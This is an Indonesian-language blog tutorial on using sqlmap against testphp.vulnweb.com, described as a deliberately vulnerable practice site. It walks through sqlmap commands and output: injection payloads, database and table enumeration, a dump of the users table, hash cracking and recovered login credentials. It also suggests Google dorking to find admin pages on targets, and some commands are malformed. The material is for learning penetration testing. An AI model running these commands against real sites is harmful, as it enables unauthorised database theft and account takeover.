Praktek Sqlmap Injection
SQLMap adalah salah satu alat (tool) open-source yang digunakan untuk melakukan penetrasi atau uji penetrasi pada aplikasi web yang rentan..
Sqlmap
SQLMap adalah salah satu alat (tool) open-source yang digunakan untuk melakukan penetrasi atau uji penetrasi pada aplikasi web yang rentan terhadap serangan SQL injection. SQL injection adalah jenis serangan di mana penyerang mencoba menyisipkan kode SQL berbahaya ke dalam permintaan aplikasi web, yang dapat mengakibatkan eksekusi kode SQL yang tidak sah atau membocorkan data sensitif.
SQLMap berfungsi dengan mengotomatisasi proses deteksi dan eksploitasi kerentanan SQL injection pada aplikasi web. Alat ini memungkinkan pengguna untuk melakukan serangan SQL injection dengan mengidentifikasi dan mengeksploitasi kerentanan tersebut, sehingga memungkinkan akses tidak sah ke basis data atau informasi sensitif.
Beberapa fitur utama SQLMap termasuk pengujian otomatis, mendeteksi jenis kerentanan, ekstraksi basis data, pengambilan tabel, kolom, dan data dari basis data yang terkena dampak, dan bahkan menjalankan perintah sistem pada host yang rentan.
Praktek Pentest kesuatu website
Di artikel ini kita aka belajar pentest ke suatu website yang dimana website ini vuln atau rentan terkena sql injection silahkan buka linux nya untuk pengguna termos bisa menyesuaikan ya.
Situs yang akan kita uji coba adalah situs vuln.php yang dimana situs ini sudah rentan terkena inject sql dan memang sengaja di publish untuk belajar pentest.
Silahkan buka terminal linux/Termos kalian.
$ sqlmap -h
___
__H__
___ ___[']_____ ___ ___ {1.7.2.8#dev}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
Ketikan perintah dibawah ini
$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
Kurang lebih nanti akan muncul informasi dibawah ini
[*] starting @ 19:48:19 /2023-07-28/
[19:48:21] [INFO] resuming back-end DBMS 'mysql'
[19:48:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 5642=5642
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: cat=1 AND GTID_SUBSET(CONCAT(0x71766b7071,(SELECT (ELT(3515=3515,1))),0x7162767a71),3515)
Type: time-based blind
Title: MySQL > 5.0.12 OR time-based blind (heavy query - comment)
Payload: cat=1 OR 6938=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)#
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x4f7065566b687a4f4c686b63774e426b594d4753484e4d616576645652634b55616973436a6d5550,0x7162767a71),NULL,NULL,NULL#
---
[19:48:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[19:48:27] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:48:27] [INFO] fetched data logged to text files under '/home/ezaafebri/.local/share/sqlmap/output/testphp.vulnweb.com'
Kita lanjutkan dengan mengetikan perintah ini
$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 acuart --tables
Kurang lebih informasinya seperti ini
Database: acuart [8 tables] +---------------------------------------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +---------------------------------------+ Database: information_schema [79 tables] +---------------------------------------+ | ADMINISTRABLE_ROLE_AUTHORIZATIONS | | APPLICABLE_ROLES | | CHARACTER_SETS | | CHECK_CONSTRAINTS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMNS_EXTENSIONS | | COLUMN_PRIVILEGES | | COLUMN_STATISTICS | | ENABLED_ROLES | | ENGINES | | EVENTS | | FILES | | INNODB_BUFFER_PAGE | | INNODB_BUFFER_PAGE_LRU | | INNODB_BUFFER_POOL_STATS | | INNODB_CACHED_INDEXES | | INNODB_CMP | | INNODB_CMPMEM | | INNODB_CMPMEM_RESET | | INNODB_CMP_PER_INDEX | | INNODB_CMP_PER_INDEX_RESET | | INNODB_CMP_RESET | | INNODB_COLUMNS | | INNODB_DATAFILES | | INNODB_FIELDS | | INNODB_FOREIGN | | INNODB_FOREIGN_COLS | | INNODB_FT_BEING_DELETED | | INNODB_FT_CONFIG | | INNODB_FT_DEFAULT_STOPWORD | | INNODB_FT_DELETED | | INNODB_FT_INDEX_CACHE | | INNODB_FT_INDEX_TABLE | | INNODB_INDEXES | | INNODB_METRICS | | INNODB_SESSION_TEMP_TABLESPACES | | INNODB_TABLES | | INNODB_TABLESPACES | | INNODB_TABLESPACES_BRIEF | | INNODB_TABLESTATS | | INNODB_TEMP_TABLE_INFO | | INNODB_TRX | | INNODB_VIRTUAL | | KEYWORDS | | KEY_COLUMN_USAGE | | OPTIMIZER_TRACE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | RESOURCE_GROUPS | | ROLE_COLUMN_GRANTS | | ROLE_ROUTINE_GRANTS | | ROLE_TABLE_GRANTS | | ROUTINES | | SCHEMATA | | SCHEMATA_EXTENSIONS | | SCHEMA_PRIVILEGES | | STATISTICS | | ST_GEOMETRY_COLUMNS | | ST_SPATIAL_REFERENCE_SYSTEMS | | ST_UNITS_OF_MEASURE | | TABLES | | TABLESPACES | | TABLESPACES_EXTENSIONS | | TABLES_EXTENSIONS | | TABLE_CONSTRAINTS | | TABLE_CONSTRAINTS_EXTENSIONS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_ATTRIBUTES | | USER_PRIVILEGES | | VIEWS | | VIEW_ROUTINE_USAGE | | VIEW_TABLE_USAGE | +---------------------------------------+
Sekarang kita akan mencari username dan password dari admin login nya.
Jika website target atau dorking google kalian harus cari tau letak admin login nya dimana gunakan berbagai tools.
kita lanjut ketikan perintah dibawah ini
$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 acuart --tables users --dump
Perhatikan source perintah dibawah ini
[19:55:40] [INFO] fetching columns for table 'users' in database 'acuart'
[19:55:40] [INFO] fetching entries for table 'users' in database 'acuart'
[19:55:40] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:55:43] [INFO] writing hashes to a temporary file '/tmp/sqlmapap0algo922092/sqlmaphashes-1a_xt8je.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[19:55:46] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[19:55:47] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[19:55:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[19:55:49] [INFO] starting 4 processes
[19:56:39] [WARNING] no clear password(s) found
Database: acuart
Table: users
Note : Perhatikan warna orange yang saya tandai ikuti perintah Y/N.
Selamat kalian sudah menemukan username dan passwordnya.
Table: users
[1 entry]
+-------------------------------------------+----------------------------------+-------------------------------------------+------+-------------------------------------------+-------------------------------------------+-------+-------------------------------------------+
| cc | cart | name | pass | email | phone | uname | address |
+-------------------------------------------+----------------------------------+-------------------------------------------+------+-------------------------------------------+-------------------------------------------+-------+-------------------------------------------+
| tx97btor4kub7wqdchwmsp28mbfh6yyvwx1xz0gq5 | f9b33abe25d5af4a12da38a378793006 | k1cefwsu8nyebzuggk0pws6bqejka12y005033kt9 | test | q5kqj4w2cv2mf7yoks4x00ajumnse96648987bo1d | y4afiuvsbl1cexxeji3nzq99tcmidz5w3y8y61nrc | test | iub98vlt1mrd4ynf9jtoprzajdcj30vxtzyzw2ds2 |
+-------------------------------------------+----------------------------------+-------------------------------------------+------+-------------------------------------------+-------------------------------------------+-------+-------------------------------------------+
[19:56:39] [INFO] table 'acuart.users' dumped to CSV file '/home/ezaafebri/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[19:56:39] [INFO] fetching columns for table 'guestbook' in database 'acuart'
[19:56:39] [INFO] fetching entries for table 'guestbook' in database 'acuart'
[19:56:39] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:56:47] [INFO] fetching number of entries for table 'guestbook' in database 'acuart'
[19:56:47] [INFO] resumed: 0
[19:56:47] [WARNING] table 'guestbook' in database 'acuart' appears to be empty
Note : Username : test dan passowrd : test
Silahkan login Kalian sudah masuk ke dashboard admin
Kurang lebih seperti itu caranya jangan disalah gunakan materi ini ya.
Disclaimer: Saya selaku founder tidak akan bertanggung jawab bila disalah gunakan materi yang saya share di artikel ini semua artikel hanya bertujuan edukasi bukan untuk kegiatan ilegal.
Gabung dalam percakapan